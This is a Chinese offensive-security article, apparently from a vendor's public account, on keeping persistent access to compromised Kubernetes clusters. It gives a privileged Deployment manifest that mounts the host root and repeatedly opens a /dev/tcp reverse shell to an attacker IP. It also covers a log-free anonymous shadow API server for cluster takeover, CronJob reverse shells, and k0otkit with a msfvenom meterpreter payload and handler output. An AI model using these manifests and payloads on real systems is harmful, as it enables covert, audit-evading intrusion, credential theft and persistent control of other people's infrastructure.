STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
前言
通过各种方法获得Kubernetes集群中的mastes或者node如何进行权限维持,从而进步渗透利用?比如像linux、windows那样进行?
此处以几种常见方法展开
控制器利用
通过DaemonSet、Deployment创建容器时,可以使容器即使被删除了也能够进步恢复重启,以实现权限维持的效果
涉及相关概念:
ReplicationController(RC):确保在任何时候都有特定数量的Pod处于运行状态
Replication Set(RS):此处推荐使用RS和Deployment代替RC,实际上RS和RC的功能基本一致,目前唯一的一个区别就是RC只支持基于等式的selector
Deployment:实现出来的效果和职责同RC一样,可以理解为RC的升级版本
Deployment
编写反弹shell的yaml文件即可
kind: Deployment # 实现在任何时候都有特定的pod处于运行状态
metadata:
name: nginx-deployment
labels:
k8s-app: nginx-de
spec:
replicas: 2 # 指定的pod数量
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
hostNetwork: true
hostPID: true
containers:
- name: nginx
image: nginx
imagePullPolicy: IfNotPresent
command: ["bash"]
args: ["-c", "bash -i >& /dev/tcp/192.168.3.1/20221 0>&1"]
securityContext:
privileged: true # 特权模式
volumeMounts:
- mountPath: /host # 挂载目录 进目录后chroot ./ bash
name: host-root
volumes:
- name: host-root
hostPath:
path: /
type: Directory
node1、node2都将反弹shell如下,因为上面创建的pod会在node1、node2,所以会挨个进行反弹
期间对创建出来的pod进行删除后,deployment将自动创建恢复pod,以再次实现反弹shell权限维持
DaemonSet
同理操作即可,轮流弹shell效果相同
shadowapiserver利用
此处自行部署的shadowapiserver该apiserver同集群内现有的apiserver具备相同功能,同时进步开启了k8s的权限,接收匿名请求且不保存日志,进步使得攻击者能够无痕迹的管理整个集群
查看当前的api-server信息如下
寻找脆弱点,确认如下
cdk直接部署shadowapiserver,效果如下
2022/03/31 06:20:04 shadow api-server deploy success!
shadow api-server pod name:kube-apiserver-master-shadow, namespace:kube-system, node name:master
listening insecure-port: 0.0.0.0:9443
listening secure-port: 0.0.0.0:9444 enabled all privilege for system:anonymous user
go further run `cdk kcurl anonymous get http://your-node-intranet-ip:9443/api` to takeover cluster with none audit logs!\
在看眼部署出来的shadow,确认部署成功后的shadowapiserver
相关实现功能配置信息如下
kube-apiserver
--advertise-address=192.168.3.19
--allow-privileged=true
--authorization-mode=AlwaysAllow
--client-ca-file=/etc/kubernetes/pki/ca.crt
--enable-admission-plugins=NodeRestriction
--enable-bootstrap-token-auth=true
--etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
--etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
--insecure-bind-address=0.0.0.0
--anonymous-auth=true
--etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
--etcd-servers=https://127.0.0.1:2379
--insecure-port=9443
--kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt
--kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key
--kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
--proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt
--proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key
--requestheader-allowed-names=front-proxy-client
--requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt
--requestheader-extra-headers-prefix=X-Remote-Extra-
--requestheader-group-headers=X-Remote-Group
--requestheader-username-headers=X-Remote-User
--secure-port=9444
--service-account-key-file=/etc/kubernetes/pki/sa.pub
--service-cluster-ip-range=10.1.0.0/16
--tls-cert-file=/etc/kubernetes/pki/apiserver.crt
--tls-private-key-file=/etc/kubernetes/pki/apiserver.key
此处部署成功后,后续我们都可以用这个新的api进行操作【无需认证】
直接获取各类token信息
同理kubectl
cronjob利用
用于执行周期性的动作,通过yaml部署以实现周期性的反弹shell,创建计划任务的yaml
创建成功效果&yaml中反弹shell信息如下
K0otkit利用
技术细节查看:
https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw
项目下载:https://github.com/Metarget/k0otkit
下载并赋予项目文件权限,修改ip&端口
生成kootkit,并进步执行反弹shell监听
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./pre_exp.sh
+ ATTACKER_IP=192.168.3.11
+ ATTACKER_PORT=20227
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=20227 LHOST=192.168.3.11 -f elf -o mrt
++ base64 -w 0
++ tr -d '\n'
++ xxd -p mrt
+ PAYLOAD=N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_template.sh
+ sed s/PAYLOAD_VALUE_BASE64/N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAzNDAwMjAwMDAxMDAwMDAwMDAwMDAwMDAwMTAwMDAwMDAwMDAwMDAwMDA4MDA0MDgwMDgwMDQwOGNmMDAwMDAwNGEwMTAwMDAwNzAwMDAwMDAwMTAwMDAwNmEwYTVlMzFkYmY3ZTM1MzQzNTM2YTAyYjA2Njg5ZTFjZDgwOTc1YjY4YzBhODAzMGI2ODAyMDA0ZjAzODllMTZhNjY1ODUwNTE1Nzg5ZTE0M2NkODA4NWMwNzkxOTRlNzQzZDY4YTIwMDAwMDA1ODZhMDA2YTA1ODllMzMxYzljZDgwODVjMDc5YmRlYjI3YjIwN2I5MDAxMDAwMDA4OWUzYzFlYjBjYzFlMzBjYjA3ZGNkODA4NWMwNzgxMDViODllMTk5YjI2YWIwMDNjZDgwODVjMDc4MDJmZmUxYjgwMTAwMDAwMGJiMDEwMDAwMDBjZDgw/g k0otkit_remote_template.sh
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444
msf6 exploit(multi/handler) >
上传并执行在攻击机生成的k0otkit.sh文件
执行后效果如下,会在kube-system下的kube-proxy进行修改
上线效果如下
安恒信息
✦
杭州亚运会网络安全服务官方合作伙伴
成都大运会网络信息安全类官方赞助商
武汉军运会、北京一带一路峰会
青岛上合峰会、上海进博会
厦门金砖峰会、G20杭州峰会
支撑单位北京奥运会等近百场国家级
重大活动网络安保支撑单位
END
长按识别二维码关注我们